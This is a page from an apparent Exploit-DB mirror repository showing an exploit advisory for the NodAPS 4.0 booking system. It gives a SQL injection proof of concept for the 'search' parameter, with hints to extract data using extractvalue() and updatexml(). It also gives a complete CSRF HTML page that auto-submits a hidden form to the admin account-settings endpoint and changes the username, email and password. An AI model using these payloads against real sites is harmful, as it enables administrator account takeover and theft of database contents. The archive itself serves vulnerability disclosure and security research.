bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/44636.txt
Offensive Security 5aca1b9763 DB: 2018-05-18 
8 changes to exploits/shellcodes

Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall

Libuser - roothelper Privilege Escalation (Metasploit)
Libuser - 'roothelper' Privilege Escalation (Metasploit)

Inteno IOPSYS 2.0 - 4.2.0 p910nd - Remote Command Execution
Inteno IOPSYS 2.0 < 4.2.0 - 'p910nd' Remote Command Execution
Nanopool Claymore Dual Miner 7.3 - Remote Code Execution
Jenkins CLI - HTTP Java Deserialization (Metasploit)
Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit)
NodAPS 4.0 - SQL injection / Cross-Site Request Forgery
Intelbras NCLOUD 300 1.0 - Authentication bypass
SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass
Powerlogic/Schneider Electric IONXXXX Series - Cross-Site Request Forgery
2018-05-18 05:01:49 +00:00

44 lines
No EOL
1.8 KiB
Text
Raw Blame History

# Exploit Title: Online Booking system - NodAPS 4.0 - 'search' SQL injection / Cross-Site Request Forgery
# Date: 2018-05-16
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/appointment-management-system-nodaps/16197805?s_rank=1535
# Version: 4.0
# Tested on: windows
================================================
# POC 1 : SQLi
# test : test.com/en/providers?search='
# Description: Put ' in the search parameter and you will have SQL syntax error.
You can use "extractvalue()" or "updatexml()" functions to get data from database.
================================================
# POC 2 : CSRF
# Description: An issue was discovered in Online Booking system - NodAPS 4.0 script.
With Cross-site request forgery (CSRF) vulnerability , attacker can hijack the authentication of users remotely.
================================================
# Exploit :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://test.com/admin/accountSetting" method="POST">
<input type="hidden" name="data&#91;username&#93;" value="testcsrf />
<input type="hidden" name="data&#91;email&#93;" value="lord&#46;nematzadeh123&#64;gmail&#46;com" />
<input type="hidden" name="data&#91;firstname&#93;" value="test2" />
<input type="hidden" name="data&#91;lastname&#93;" value="test3" />
<input type="hidden" name="data&#91;mobile&#93;" value="1000000000" />
<input type="hidden" name="data&#91;website&#93;" value="" />
<input type="hidden" name="data&#91;password&#93;" value="1234567890&#45;" />
<input type="hidden" name="data&#91;language&#95;id&#93;" value="1" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Reference in a new issue View git blame Copy permalink